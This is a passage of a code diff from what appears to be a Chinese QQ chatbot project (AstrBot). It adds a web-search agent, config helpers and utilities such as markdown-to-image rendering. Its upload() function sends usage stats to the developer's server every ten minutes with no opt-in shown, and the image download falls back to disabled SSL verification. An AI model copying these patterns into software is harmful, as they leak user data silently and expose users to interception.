"func_call_again": bool // 如果函数返回的结果有错误或者问题,可将其设置为true,否则为false
|
||||
}
|
||||
```
|
||||
- 如果func_call_again为true,res请你设为空值,否则请你填写回答的内容。"""
|
||||
else:
|
||||
raise e
|
||||
|
||||
if "func_call_again" in after_prompt_res and after_prompt_res["func_call_again"]:
|
||||
# 如果需要重新调用函数
|
||||
# 重新调用函数
|
||||
gu.log("REVGPT func_call_again",
|
||||
bg=gu.BG_COLORS["purple"], fg=gu.FG_COLORS["white"])
|
||||
res = self.func_call(question, func_definition)
|
||||
return res, True
|
||||
|
||||
gu.log("REVGPT func callback:",
|
||||
bg=gu.BG_COLORS["green"], fg=gu.FG_COLORS["white"])
|
||||
# print(after_prompt_res["res"])
|
||||
return after_prompt_res["res"], True
|
||||
else:
|
||||
return str(invoke_func_res_list), True
|
||||
else:
|
||||
# print(res["res"])
|
||||
return res["res"], False
|
||||
183
util/agent/web_searcher.py
Normal file
@@ -0,0 +1,183 @@
|
||||
import traceback
|
||||
import random
|
||||
import json
|
||||
import asyncio
|
||||
import aiohttp
|
||||
import os
|
||||
|
||||
from readability import Document
|
||||
from bs4 import BeautifulSoup
|
||||
from openai.types.chat.chat_completion_message_tool_call import Function
|
||||
from util.agent.func_call import FuncCall
|
||||
from util.search_engine_scraper.config import HEADERS, USER_AGENTS
|
||||
from util.search_engine_scraper.bing import Bing
|
||||
from util.search_engine_scraper.sogo import Sogo
|
||||
from util.search_engine_scraper.google import Google
|
||||
from model.provider.provider import Provider
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot-core')
|
||||
|
||||
|
||||
bing_search = Bing()
|
||||
sogo_search = Sogo()
|
||||
google = Google()
|
||||
proxy = os.environ.get("HTTPS_PROXY", None)
|
||||
|
||||
def tidy_text(text: str) -> str:
|
||||
'''
|
||||
清理文本,去除空格、换行符等
|
||||
'''
|
||||
return text.strip().replace("\n", " ").replace("\r", " ").replace(" ", " ")
|
||||
|
||||
# def special_fetch_zhihu(link: str) -> str:
|
||||
# '''
|
||||
# function-calling 函数, 用于获取知乎文章的内容
|
||||
# '''
|
||||
# response = requests.get(link, headers=HEADERS)
|
||||
# response.encoding = "utf-8"
|
||||
# soup = BeautifulSoup(response.text, "html.parser")
|
||||
|
||||
# if "zhuanlan.zhihu.com" in link:
|
||||
# r = soup.find(class_="Post-RichTextContainer")
|
||||
# else:
|
||||
# r = soup.find(class_="List-item").find(class_="RichContent-inner")
|
||||
# if r is None:
|
||||
# print("debug: zhihu none")
|
||||
# raise Exception("zhihu none")
|
||||
# return tidy_text(r.text)
|
||||
|
||||
async def search_from_bing(keyword: str) -> str:
|
||||
'''
|
||||
tools, 从 bing 搜索引擎搜索
|
||||
'''
|
||||
logger.info("web_searcher - search_from_bing: " + keyword)
|
||||
results = []
|
||||
try:
|
||||
results = await google.search(keyword, 5)
|
||||
except BaseException as e:
|
||||
logger.error(f"google search error: {e}, try the next one...")
|
||||
if len(results) == 0:
|
||||
logger.debug("search google failed")
|
||||
try:
|
||||
results = await bing_search.search(keyword, 5)
|
||||
except BaseException as e:
|
||||
logger.error(f"bing search error: {e}, try the next one...")
|
||||
if len(results) == 0:
|
||||
logger.debug("search bing failed")
|
||||
try:
|
||||
results = await sogo_search.search(keyword, 5)
|
||||
except BaseException as e:
|
||||
logger.error(f"sogo search error: {e}")
|
||||
if len(results) == 0:
|
||||
logger.debug("search sogo failed")
|
||||
return "没有搜索到结果"
|
||||
ret = ""
|
||||
idx = 1
|
||||
for i in results:
|
||||
logger.info(f"web_searcher - scraping web: {i.title} - {i.url}")
|
||||
try:
|
||||
site_result = await fetch_website_content(i.url)
|
||||
except:
|
||||
site_result = ""
|
||||
site_result = site_result[:600] + "..." if len(site_result) > 600 else site_result
|
||||
ret += f"{idx}. {i.title} \n{i.snippet}\n{site_result}\n\n"
|
||||
idx += 1
|
||||
return ret
|
||||
|
||||
|
||||
async def fetch_website_content(url):
|
||||
header = HEADERS
|
||||
header.update({'User-Agent': random.choice(USER_AGENTS)})
|
||||
async with aiohttp.ClientSession() as session:
|
||||
async with session.get(url, headers=HEADERS, timeout=6, proxy=proxy) as response:
|
||||
html = await response.text(encoding="utf-8")
|
||||
doc = Document(html)
|
||||
ret = doc.summary(html_partial=True)
|
||||
soup = BeautifulSoup(ret, 'html.parser')
|
||||
ret = tidy_text(soup.get_text())
|
||||
return ret
|
||||
|
||||
|
||||
async def web_search(prompt, provider: Provider, session_id, official_fc=False):
|
||||
'''
|
||||
official_fc: 使用官方 function-calling
|
||||
'''
|
||||
new_func_call = FuncCall(provider)
|
||||
|
||||
new_func_call.add_func("web_search", [{
|
||||
"type": "string",
|
||||
"name": "keyword",
|
||||
"description": "搜索关键词"
|
||||
}],
|
||||
"通过搜索引擎搜索。如果问题需要获取近期、实时的消息,在网页上搜索(如天气、新闻或任何需要通过网页获取信息的问题),则调用此函数;如果没有,不要调用此函数。",
|
||||
search_from_bing
|
||||
)
|
||||
new_func_call.add_func("fetch_website_content", [{
|
||||
"type": "string",
|
||||
"name": "url",
|
||||
"description": "要获取内容的网页链接"
|
||||
}],
|
||||
"获取网页的内容。如果问题带有合法的网页链接并且用户有需求了解网页内容(例如: `帮我总结一下 https://github.com 的内容`), 就调用此函数。如果没有,不要调用此函数。",
|
||||
fetch_website_content
|
||||
)
|
||||
|
||||
has_func = False
|
||||
function_invoked_ret = ""
|
||||
if official_fc:
|
||||
# we use official function-calling
|
||||
result = await provider.text_chat(prompt, session_id, tools=new_func_call.get_func())
|
||||
if isinstance(result, Function):
|
||||
logger.debug(f"web_searcher - function-calling: {result}")
|
||||
func_obj = None
|
||||
for i in new_func_call.func_list:
|
||||
if i["name"] == result.name:
|
||||
func_obj = i["func_obj"]
|
||||
break
|
||||
if not func_obj:
|
||||
return await provider.text_chat(prompt, session_id) + "\n(网页搜索失败, 此为默认回复)"
|
||||
try:
|
||||
args = json.loads(result.arguments)
|
||||
function_invoked_ret = await func_obj(**args)
|
||||
has_func = True
|
||||
except BaseException as e:
|
||||
traceback.print_exc()
|
||||
return await provider.text_chat(prompt, session_id) + "\n(网页搜索失败, 此为默认回复)"
|
||||
else:
|
||||
return result
|
||||
else:
|
||||
# we use our own function-calling
|
||||
try:
|
||||
args = {
|
||||
'question': prompt,
|
||||
'func_definition': new_func_call.func_dump(),
|
||||
'is_task': False,
|
||||
'is_summary': False,
|
||||
}
|
||||
function_invoked_ret, has_func = await asyncio.to_thread(new_func_call.func_call, **args)
|
||||
except BaseException as e:
|
||||
res = await provider.text_chat(prompt) + "\n(网页搜索失败, 此为默认回复)"
|
||||
return res
|
||||
has_func = True
|
||||
|
||||
if has_func:
|
||||
await provider.forget(session_id)
|
||||
summary_prompt = f"""
|
||||
你是一个专业且高效的助手,你的任务是
|
||||
1. 根据下面的相关材料对用户的问题 `{prompt}` 进行总结;
|
||||
2. 简单地发表你对这个问题的简略看法。
|
||||
|
||||
# 例子
|
||||
1. 从网上的信息来看,可以知道...我个人认为...你觉得呢?
|
||||
2. 根据网上的最新信息,可以得知...我觉得...你怎么看?
|
||||
|
||||
# 限制
|
||||
1. 限制在 200 字以内;
|
||||
2. 请**直接输出总结**,不要输出多余的内容和提示语。
|
||||
|
||||
# 相关材料
|
||||
{function_invoked_ret}"""
|
||||
ret = await provider.text_chat(summary_prompt, session_id)
|
||||
return ret
|
||||
return function_invoked_ret
|
||||
119
util/cmd_config.py
Normal file
@@ -0,0 +1,119 @@
|
||||
import os
|
||||
import json
|
||||
from typing import Union
|
||||
|
||||
cpath = "data/cmd_config.json"
|
||||
|
||||
def check_exist():
|
||||
if not os.path.exists(cpath):
|
||||
with open(cpath, "w", encoding="utf-8-sig") as f:
|
||||
json.dump({}, f, indent=4, ensure_ascii=False)
|
||||
f.flush()
|
||||
|
||||
|
||||
class CmdConfig():
|
||||
|
||||
@staticmethod
|
||||
def get(key, default=None):
|
||||
check_exist()
|
||||
with open(cpath, "r", encoding="utf-8-sig") as f:
|
||||
d = json.load(f)
|
||||
if key in d:
|
||||
return d[key]
|
||||
else:
|
||||
return default
|
||||
|
||||
@staticmethod
|
||||
def get_all():
|
||||
check_exist()
|
||||
with open(cpath, "r", encoding="utf-8-sig") as f:
|
||||
return json.load(f)
|
||||
|
||||
@staticmethod
|
||||
def put(key, value):
|
||||
check_exist()
|
||||
with open(cpath, "r", encoding="utf-8-sig") as f:
|
||||
d = json.load(f)
|
||||
d[key] = value
|
||||
with open(cpath, "w", encoding="utf-8-sig") as f:
|
||||
json.dump(d, f, indent=4, ensure_ascii=False)
|
||||
f.flush()
|
||||
|
||||
@staticmethod
|
||||
def put_by_dot_str(key: str, value):
|
||||
'''
|
||||
根据点分割的字符串,将值写入配置文件
|
||||
'''
|
||||
check_exist()
|
||||
with open(cpath, "r", encoding="utf-8-sig") as f:
|
||||
d = json.load(f)
|
||||
_d = d
|
||||
_ks = key.split(".")
|
||||
for i in range(len(_ks)):
|
||||
if i == len(_ks) - 1:
|
||||
_d[_ks[i]] = value
|
||||
else:
|
||||
_d = _d[_ks[i]]
|
||||
with open(cpath, "w", encoding="utf-8-sig") as f:
|
||||
json.dump(d, f, indent=4, ensure_ascii=False)
|
||||
f.flush()
|
||||
|
||||
@staticmethod
|
||||
def init_attributes(key: Union[str, list], init_val=""):
|
||||
check_exist()
|
||||
conf_str = ''
|
||||
with open(cpath, "r", encoding="utf-8-sig") as f:
|
||||
conf_str = f.read()
|
||||
if conf_str.startswith(u'/ufeff'):
|
||||
conf_str = conf_str.encode('utf8')[3:].decode('utf8')
|
||||
d = json.loads(conf_str)
|
||||
_tag = False
|
||||
|
||||
if isinstance(key, str):
|
||||
if key not in d:
|
||||
d[key] = init_val
|
||||
_tag = True
|
||||
elif isinstance(key, list):
|
||||
for k in key:
|
||||
if k not in d:
|
||||
d[k] = init_val
|
||||
_tag = True
|
||||
if _tag:
|
||||
with open(cpath, "w", encoding="utf-8-sig") as f:
|
||||
json.dump(d, f, indent=4, ensure_ascii=False)
|
||||
f.flush()
|
||||
|
||||
|
||||
def init_astrbot_config_items():
|
||||
# 加载默认配置
|
||||
cc = CmdConfig()
|
||||
cc.init_attributes("qq_forward_threshold", 200)
|
||||
cc.init_attributes("qq_welcome", "")
|
||||
cc.init_attributes("qq_pic_mode", False)
|
||||
cc.init_attributes("gocq_host", "127.0.0.1")
|
||||
cc.init_attributes("gocq_http_port", 5700)
|
||||
cc.init_attributes("gocq_websocket_port", 6700)
|
||||
cc.init_attributes("gocq_react_group", True)
|
||||
cc.init_attributes("gocq_react_guild", True)
|
||||
cc.init_attributes("gocq_react_friend", True)
|
||||
cc.init_attributes("gocq_react_group_increase", True)
|
||||
cc.init_attributes("other_admins", [])
|
||||
cc.init_attributes("CHATGPT_BASE_URL", "")
|
||||
cc.init_attributes("qqbot_secret", "")
|
||||
cc.init_attributes("qqofficial_enable_group_message", False)
|
||||
cc.init_attributes("admin_qq", "")
|
||||
cc.init_attributes("nick_qq", ["!", "!", "ai"])
|
||||
cc.init_attributes("admin_qqchan", "")
|
||||
cc.init_attributes("llm_env_prompt", "")
|
||||
cc.init_attributes("llm_wake_prefix", "")
|
||||
cc.init_attributes("default_personality_str", "")
|
||||
cc.init_attributes("openai_image_generate", {
|
||||
"model": "dall-e-3",
|
||||
"size": "1024x1024",
|
||||
"style": "vivid",
|
||||
"quality": "standard",
|
||||
})
|
||||
cc.init_attributes("http_proxy", "")
|
||||
cc.init_attributes("https_proxy", "")
|
||||
cc.init_attributes("dashboard_username", "")
|
||||
cc.init_attributes("dashboard_password", "")
|
||||
@@ -1,3 +0,0 @@
|
||||
class PromptExceededError(Exception):
|
||||
|
||||
pass
|
||||
521
util/general_utils.py
Normal file
@@ -0,0 +1,521 @@
|
||||
import time
|
||||
import socket
|
||||
import os
|
||||
import re
|
||||
import requests
|
||||
import aiohttp
|
||||
import socket
|
||||
import platform
|
||||
import json
|
||||
import sys
|
||||
import psutil
|
||||
import ssl
|
||||
|
||||
from PIL import Image, ImageDraw, ImageFont
|
||||
from type.types import GlobalObject
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot-core')
|
||||
|
||||
|
||||
def port_checker(port: int, host: str = "localhost"):
|
||||
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
sk.settimeout(1)
|
||||
try:
|
||||
sk.connect((host, port))
|
||||
sk.close()
|
||||
return True
|
||||
except Exception:
|
||||
sk.close()
|
||||
return False
|
||||
|
||||
|
||||
def get_font_path() -> str:
|
||||
if os.path.exists("resources/fonts/syst.otf"):
|
||||
font_path = "resources/fonts/syst.otf"
|
||||
elif os.path.exists("QQChannelChatGPT/resources/fonts/syst.otf"):
|
||||
font_path = "QQChannelChatGPT/resources/fonts/syst.otf"
|
||||
elif os.path.exists("AstrBot/resources/fonts/syst.otf"):
|
||||
font_path = "AstrBot/resources/fonts/syst.otf"
|
||||
elif os.path.exists("C:/Windows/Fonts/simhei.ttf"):
|
||||
font_path = "C:/Windows/Fonts/simhei.ttf"
|
||||
elif os.path.exists("/usr/share/fonts/opentype/noto/NotoSansCJK-Regular.ttc"):
|
||||
font_path = "/usr/share/fonts/opentype/noto/NotoSansCJK-Regular.ttc"
|
||||
else:
|
||||
raise Exception("找不到字体文件")
|
||||
return font_path
|
||||
|
||||
|
||||
def word2img(title: str, text: str, max_width=30, font_size=20):
|
||||
font_path = get_font_path()
|
||||
width_factor = 1.0
|
||||
height_factor = 1.5
|
||||
# 格式化文本宽度最大为30
|
||||
lines = text.split('\n')
|
||||
i = 0
|
||||
length = len(lines)
|
||||
for l in lines:
|
||||
if len(l) > max_width:
|
||||
cp = l
|
||||
for ii in range(len(l)):
|
||||
if ii % max_width == 0:
|
||||
cp = cp[:ii] + '\n' + cp[ii:]
|
||||
length += 1
|
||||
lines[i] = cp
|
||||
i += 1
|
||||
text = '\n'.join(lines)
|
||||
width = int(max_width * font_size * width_factor)
|
||||
height = int(length * font_size * height_factor)
|
||||
image = Image.new('RGB', (width, height), (255, 255, 255))
|
||||
draw = ImageDraw.Draw(image)
|
||||
|
||||
text_font = ImageFont.truetype(font_path, font_size)
|
||||
title_font = ImageFont.truetype(font_path, font_size + 5)
|
||||
# 标题居中
|
||||
title_width, title_height = title_font.getsize(title)
|
||||
draw.text(((width - title_width) / 2, 10),
|
||||
title, fill=(0, 0, 0), font=title_font)
|
||||
# 文本不居中
|
||||
draw.text((10, title_height+20), text, fill=(0, 0, 0), font=text_font)
|
||||
|
||||
return image
|
||||
|
||||
|
||||
def render_markdown(markdown_text, image_width=800, image_height=600, font_size=26, font_color=(0, 0, 0), bg_color=(255, 255, 255)):
|
||||
|
||||
HEADER_MARGIN = 20
|
||||
HEADER_FONT_STANDARD_SIZE = 42
|
||||
|
||||
QUOTE_LEFT_LINE_MARGIN = 10
|
||||
QUOTE_FONT_LINE_MARGIN = 6 # 引用文字距离左边线的距离和上下的距离
|
||||
QUOTE_LEFT_LINE_HEIGHT = font_size + QUOTE_FONT_LINE_MARGIN * 2
|
||||
QUOTE_LEFT_LINE_WIDTH = 5
|
||||
QUOTE_LEFT_LINE_COLOR = (180, 180, 180)
|
||||
QUOTE_FONT_SIZE = font_size
|
||||
QUOTE_FONT_COLOR = (180, 180, 180)
|
||||
# QUOTE_BG_COLOR = (255, 255, 255)
|
||||
|
||||
CODE_BLOCK_MARGIN = 10
|
||||
CODE_BLOCK_FONT_SIZE = font_size
|
||||
CODE_BLOCK_FONT_COLOR = (255, 255, 255)
|
||||
CODE_BLOCK_BG_COLOR = (240, 240, 240)
|
||||
CODE_BLOCK_CODES_MARGIN_VERTICAL = 5 # 代码块和代码之间的距离
|
||||
CODE_BLOCK_CODES_MARGIN_HORIZONTAL = 5 # 代码块和代码之间的距离
|
||||
CODE_BLOCK_TEXT_MARGIN = 4 # 代码和代码之间的距离
|
||||
|
||||
INLINE_CODE_MARGIN = 8
|
||||
INLINE_CODE_FONT_SIZE = font_size
|
||||
INLINE_CODE_FONT_COLOR = font_color
|
||||
INLINE_CODE_FONT_MARGIN = 4
|
||||
INLINE_CODE_BG_COLOR = (230, 230, 230)
|
||||
INLINE_CODE_BG_HEIGHT = INLINE_CODE_FONT_SIZE + INLINE_CODE_FONT_MARGIN * 2
|
||||
|
||||
LIST_MARGIN = 8
|
||||
LIST_FONT_SIZE = font_size
|
||||
LIST_FONT_COLOR = font_color
|
||||
|
||||
TEXT_LINE_MARGIN = 8
|
||||
|
||||
IMAGE_MARGIN = 15
|
||||
# 用于匹配图片的正则表达式
|
||||
IMAGE_REGEX = r"!\s*\[.*?\]\s*\((.*?)\)"
|
||||
|
||||
font_path = get_font_path()
|
||||
font_path1 = font_path
|
||||
|
||||
# 加载字体
|
||||
font = ImageFont.truetype(font_path, font_size)
|
||||
|
||||
images: Image = {}
|
||||
|
||||
# pre_process, get height of each line
|
||||
pre_lines = markdown_text.split('\n')
|
||||
height = 0
|
||||
pre_in_code = False
|
||||
i = -1
|
||||
_pre_lines = []
|
||||
for line in pre_lines:
|
||||
i += 1
|
||||
# 处理图片
|
||||
if re.search(IMAGE_REGEX, line):
|
||||
try:
|
||||
image_url = re.findall(IMAGE_REGEX, line)[0]
|
||||
print(image_url)
|
||||
image_res = Image.open(requests.get(
|
||||
image_url, stream=True, timeout=5).raw)
|
||||
images[i] = image_res
|
||||
# 最大不得超过image_width的50%
|
||||
img_height = image_res.size[1]
|
||||
|
||||
if image_res.size[0] > image_width*0.5:
|
||||
image_res = image_res.resize(
|
||||
(int(image_width*0.5), int(image_res.size[1]*image_width*0.5/image_res.size[0])))
|
||||
img_height = image_res.size[1]
|
||||
|
||||
height += img_height + IMAGE_MARGIN*2
|
||||
|
||||
line = re.sub(IMAGE_REGEX, "", line)
|
||||
except Exception as e:
|
||||
print(e)
|
||||
line = re.sub(IMAGE_REGEX, "\n[加载失败的图片]\n", line)
|
||||
continue
|
||||
|
||||
line.replace("\t", " ")
|
||||
if font.getsize(line)[0] > image_width:
|
||||
cp = line
|
||||
_width = 0
|
||||
_word_cnt = 0
|
||||
for ii in range(len(line)):
|
||||
# 检测是否是中文
|
||||
_width += font.getsize(line[ii])[0]
|
||||
_word_cnt += 1
|
||||
if _width > image_width:
|
||||
_pre_lines.append(cp[:_word_cnt])
|
||||
cp = cp[_word_cnt:]
|
||||
_word_cnt = 0
|
||||
_width = 0
|
||||
_pre_lines.append(cp)
|
||||
else:
|
||||
_pre_lines.append(line)
|
||||
pre_lines = _pre_lines
|
||||
|
||||
i = -1
|
||||
for line in pre_lines:
|
||||
if line == "":
|
||||
height += TEXT_LINE_MARGIN
|
||||
continue
|
||||
i += 1
|
||||
line = line.strip()
|
||||
if pre_in_code and not line.startswith("```"):
|
||||
height += font_size + CODE_BLOCK_TEXT_MARGIN
|
||||
# pre_codes.append(line)
|
||||
continue
|
||||
if line.startswith("#"):
|
||||
header_level = line.count("#")
|
||||
height += HEADER_FONT_STANDARD_SIZE + HEADER_MARGIN*2 - header_level * 4
|
||||
elif line.startswith("-"):
|
||||
height += font_size+LIST_MARGIN*2
|
||||
elif line.startswith(">"):
|
||||
height += font_size+QUOTE_LEFT_LINE_MARGIN*2
|
||||
elif line.startswith("```"):
|
||||
if pre_in_code:
|
||||
pre_in_code = False
|
||||
# pre_codes = []
|
||||
height += CODE_BLOCK_MARGIN
|
||||
else:
|
||||
pre_in_code = True
|
||||
height += CODE_BLOCK_MARGIN
|
||||
elif re.search(r"`(.*?)`", line):
|
||||
height += font_size+INLINE_CODE_FONT_MARGIN*2+INLINE_CODE_MARGIN*2
|
||||
else:
|
||||
height += font_size + TEXT_LINE_MARGIN*2
|
||||
|
||||
markdown_text = '\n'.join(pre_lines)
|
||||
image_height = height
|
||||
if image_height < 100:
|
||||
image_height = 100
|
||||
image_width += 20
|
||||
|
||||
# 创建空白图像
|
||||
image = Image.new('RGB', (image_width, image_height), bg_color)
|
||||
draw = ImageDraw.Draw(image)
|
||||
|
||||
# 设置初始位置
|
||||
x, y = 10, 10
|
||||
|
||||
# 解析Markdown文本
|
||||
lines = markdown_text.split("\n")
|
||||
# lines = pre_lines
|
||||
|
||||
in_code_block = False
|
||||
code_block_start_y = 0
|
||||
code_block_codes = []
|
||||
|
||||
index = -1
|
||||
for line in lines:
|
||||
index += 1
|
||||
if in_code_block and not line.startswith("```"):
|
||||
code_block_codes.append(line)
|
||||
y += font_size + CODE_BLOCK_TEXT_MARGIN
|
||||
continue
|
||||
line = line.strip()
|
||||
|
||||
if line.startswith("#"):
|
||||
# 处理标题
|
||||
header_level = line.count("#")
|
||||
line = line.strip("#").strip()
|
||||
font_size_header = HEADER_FONT_STANDARD_SIZE - header_level * 4
|
||||
font = ImageFont.truetype(font_path, font_size_header)
|
||||
y += HEADER_MARGIN # 上边距
|
||||
# 字间距
|
||||
draw.text((x, y), line, font=font, fill=font_color)
|
||||
draw.line((x, y + font_size_header + 8, image_width - 10,
|
||||
y + font_size_header + 8), fill=(230, 230, 230), width=3)
|
||||
y += font_size_header + HEADER_MARGIN
|
||||
|
||||
elif line.startswith(">"):
|
||||
# 处理引用
|
||||
quote_text = line.strip(">")
|
||||
y += QUOTE_LEFT_LINE_MARGIN
|
||||
draw.line((x, y, x, y + QUOTE_LEFT_LINE_HEIGHT),
|
||||
fill=QUOTE_LEFT_LINE_COLOR, width=QUOTE_LEFT_LINE_WIDTH)
|
||||
font = ImageFont.truetype(font_path, QUOTE_FONT_SIZE)
|
||||
draw.text((x + QUOTE_FONT_LINE_MARGIN, y + QUOTE_FONT_LINE_MARGIN),
|
||||
quote_text, font=font, fill=QUOTE_FONT_COLOR)
|
||||
y += font_size + QUOTE_LEFT_LINE_HEIGHT + QUOTE_LEFT_LINE_MARGIN
|
||||
|
||||
elif line.startswith("-"):
|
||||
# 处理列表
|
||||
list_text = line.strip("-").strip()
|
||||
font = ImageFont.truetype(font_path, LIST_FONT_SIZE)
|
||||
y += LIST_MARGIN
|
||||
draw.text((x, y), " · " + list_text,
|
||||
font=font, fill=LIST_FONT_COLOR)
|
||||
y += font_size + LIST_MARGIN
|
||||
|
||||
elif line.startswith("```"):
|
||||
if not in_code_block:
|
||||
code_block_start_y = y+CODE_BLOCK_MARGIN
|
||||
in_code_block = True
|
||||
else:
|
||||
# print(code_block_codes)
|
||||
in_code_block = False
|
||||
codes = "\n".join(code_block_codes)
|
||||
code_block_codes = []
|
||||
draw.rounded_rectangle((x, code_block_start_y, image_width - 10, y+CODE_BLOCK_CODES_MARGIN_VERTICAL +
|
||||
CODE_BLOCK_TEXT_MARGIN), radius=5, fill=CODE_BLOCK_BG_COLOR, width=2)
|
||||
font = ImageFont.truetype(font_path1, CODE_BLOCK_FONT_SIZE)
|
||||
draw.text((x + CODE_BLOCK_CODES_MARGIN_HORIZONTAL, code_block_start_y +
|
||||
CODE_BLOCK_CODES_MARGIN_VERTICAL), codes, font=font, fill=font_color)
|
||||
y += CODE_BLOCK_CODES_MARGIN_VERTICAL + CODE_BLOCK_MARGIN
|
||||
# y += font_size+10
|
||||
elif re.search(r"`(.*?)`", line):
|
||||
y += INLINE_CODE_MARGIN # 上边距
|
||||
# 处理行内代码
|
||||
code_regex = r"`(.*?)`"
|
||||
parts_inline = re.findall(code_regex, line)
|
||||
# print(parts_inline)
|
||||
parts = re.split(code_regex, line)
|
||||
# print(parts)
|
||||
for part in parts:
|
||||
# the judge has a tiny bug.
|
||||
# when line is like "hi`hi`". all the parts will be in parts_inline.
|
||||
if part in parts_inline:
|
||||
font = ImageFont.truetype(font_path, INLINE_CODE_FONT_SIZE)
|
||||
code_text = part.strip("`")
|
||||
code_width = font.getsize(
|
||||
code_text)[0] + INLINE_CODE_FONT_MARGIN*2
|
||||
x += INLINE_CODE_MARGIN
|
||||
code_box = (x, y, x + code_width,
|
||||
y + INLINE_CODE_BG_HEIGHT)
|
||||
draw.rounded_rectangle(
|
||||
code_box, radius=5, fill=INLINE_CODE_BG_COLOR, width=2) # 使用灰色填充矩形框作为引用背景
|
||||
draw.text((x+INLINE_CODE_FONT_MARGIN, y),
|
||||
code_text, font=font, fill=font_color)
|
||||
x += code_width+INLINE_CODE_MARGIN-INLINE_CODE_FONT_MARGIN
|
||||
else:
|
||||
font = ImageFont.truetype(font_path, font_size)
|
||||
draw.text((x, y), part, font=font, fill=font_color)
|
||||
x += font.getsize(part)[0]
|
||||
y += font_size + INLINE_CODE_MARGIN
|
||||
x = 10
|
||||
|
||||
else:
|
||||
# 处理普通文本
|
||||
if line == "":
|
||||
y += TEXT_LINE_MARGIN
|
||||
else:
|
||||
font = ImageFont.truetype(font_path, font_size)
|
||||
|
||||
draw.text((x, y), line, font=font, fill=font_color)
|
||||
y += font_size + TEXT_LINE_MARGIN*2
|
||||
|
||||
# 图片特殊处理
|
||||
if index in images:
|
||||
image_res = images[index]
|
||||
# 最大不得超过image_width的50%
|
||||
if image_res.size[0] > image_width*0.5:
|
||||
image_res = image_res.resize(
|
||||
(int(image_width*0.5), int(image_res.size[1]*image_width*0.5/image_res.size[0])))
|
||||
image.paste(image_res, (IMAGE_MARGIN, y))
|
||||
y += image_res.size[1] + IMAGE_MARGIN*2
|
||||
return image
|
||||
|
||||
|
||||
def save_temp_img(img: Image) -> str:
|
||||
if not os.path.exists("temp"):
|
||||
os.makedirs("temp")
|
||||
|
||||
# 获得文件创建时间,清除超过1小时的
|
||||
try:
|
||||
for f in os.listdir("temp"):
|
||||
path = os.path.join("temp", f)
|
||||
if os.path.isfile(path):
|
||||
ctime = os.path.getctime(path)
|
||||
if time.time() - ctime > 3600:
|
||||
os.remove(path)
|
||||
except Exception as e:
|
||||
print(f"清除临时文件失败: {e}")
|
||||
|
||||
# 获得时间戳
|
||||
timestamp = int(time.time())
|
||||
p = f"temp/{timestamp}.jpg"
|
||||
|
||||
if isinstance(img, Image.Image):
|
||||
img.save(p)
|
||||
else:
|
||||
with open(p, "wb") as f:
|
||||
f.write(img)
|
||||
logger.info(f"保存临时图片: {p}")
|
||||
return p
|
||||
|
||||
async def download_image_by_url(url: str) -> str:
|
||||
'''
|
||||
下载图片
|
||||
'''
|
||||
try:
|
||||
logger.info(f"下载图片: {url}")
|
||||
async with aiohttp.ClientSession() as session:
|
||||
async with session.get(url) as resp:
|
||||
return save_temp_img(await resp.read())
|
||||
except aiohttp.client_exceptions.ClientConnectorSSLError as e:
|
||||
# 关闭SSL验证
|
||||
ssl_context = ssl.create_default_context()
|
||||
ssl_context.check_hostname = False
|
||||
ssl_context.verify_mode = ssl.CERT_NONE
|
||||
async with aiohttp.ClientSession(trust_env=False) as session:
|
||||
async with session.get(url, ssl=ssl_context) as resp:
|
||||
return save_temp_img(await resp.read())
|
||||
except Exception as e:
|
||||
raise e
|
||||
|
||||
|
||||
def create_text_image(title: str, text: str, max_width=30, font_size=20):
|
||||
'''
|
||||
文本转图片。
|
||||
title: 标题
|
||||
text: 文本内容
|
||||
max_width: 文本宽度最大值(默认30)
|
||||
font_size: 字体大小(默认20)
|
||||
|
||||
返回:文件路径
|
||||
'''
|
||||
try:
|
||||
img = word2img(title, text, max_width, font_size)
|
||||
p = save_temp_img(img)
|
||||
return p
|
||||
except Exception as e:
|
||||
raise e
|
||||
|
||||
|
||||
def create_markdown_image(text: str):
|
||||
'''
|
||||
markdown文本转图片。
|
||||
返回:文件路径
|
||||
'''
|
||||
try:
|
||||
img = render_markdown(text)
|
||||
p = save_temp_img(img)
|
||||
return p
|
||||
except Exception as e:
|
||||
raise e
|
||||
|
||||
|
||||
def try_migrate_config():
|
||||
'''
|
||||
将 cmd_config.json 迁移至 data/cmd_config.json
|
||||
'''
|
||||
if os.path.exists("cmd_config.json"):
|
||||
with open("cmd_config.json", "r", encoding="utf-8-sig") as f:
|
||||
data = json.load(f)
|
||||
with open("data/cmd_config.json", "w", encoding="utf-8-sig") as f:
|
||||
json.dump(data, f, indent=2, ensure_ascii=False)
|
||||
try:
|
||||
os.remove("cmd_config.json")
|
||||
except Exception as e:
|
||||
pass
|
||||
|
||||
|
||||
def get_local_ip_addresses():
|
||||
ip = ''
|
||||
try:
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
s.connect(('8.8.8.8', 80))
|
||||
ip = s.getsockname()[0]
|
||||
except BaseException as e:
|
||||
pass
|
||||
finally:
|
||||
s.close()
|
||||
return ip
|
||||
|
||||
|
||||
def get_sys_info(global_object: GlobalObject):
|
||||
mem = None
|
||||
stats = global_object.dashboard_data.stats
|
||||
os_name = platform.system()
|
||||
os_version = platform.version()
|
||||
|
||||
if 'sys_perf' in stats and 'memory' in stats['sys_perf']:
|
||||
mem = stats['sys_perf']['memory']
|
||||
return {
|
||||
'mem': mem,
|
||||
'os': os_name + '_' + os_version,
|
||||
'py': platform.python_version(),
|
||||
}
|
||||
|
||||
|
||||
def upload(_global_object: GlobalObject):
|
||||
while True:
|
||||
addr_ip = ''
|
||||
try:
|
||||
res = {
|
||||
"version": _global_object.version,
|
||||
"count": _global_object.cnt_total,
|
||||
"ip": addr_ip,
|
||||
"sys": sys.platform,
|
||||
"admin": "null",
|
||||
}
|
||||
resp = requests.post(
|
||||
'https://api.soulter.top/upload', data=json.dumps(res), timeout=5)
|
||||
if resp.status_code == 200:
|
||||
ok = resp.json()
|
||||
if ok['status'] == 'ok':
|
||||
_global_object.cnt_total = 0
|
||||
except BaseException as e:
|
||||
pass
|
||||
time.sleep(10*60)
|
||||
|
||||
def retry(n: int = 3):
|
||||
'''
|
||||
重试装饰器
|
||||
'''
|
||||
def decorator(func):
|
||||
def wrapper(*args, **kwargs):
|
||||
for i in range(n):
|
||||
try:
